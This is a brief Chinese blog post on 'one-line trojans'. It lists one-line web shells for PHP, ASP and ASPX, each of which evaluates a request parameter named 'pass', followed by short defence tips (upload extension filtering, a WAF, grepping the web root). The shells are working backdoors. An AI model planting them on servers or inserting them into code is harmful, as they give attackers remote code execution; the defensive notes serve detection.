一句话木马

标签：eva   script   waf   post   php   pass   ring   vbscript   asp   

php 　　<?php @eval($_post[‘pass‘]);?>

asp　　<%eval request ("pass")%>

aspx　　<%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>

防御

　　代码中过滤。限制上传文件的后缀名

　　waf过滤

　　检查是否存在一句话木马。fgrep -R ‘一句话木马代码‘ /var/www/xxx

一句话木马

标签：eva   script   waf   post   php   pass   ring   vbscript   asp   

原文地址：https://www.cnblogs.com/jiersixi/p/11369311.html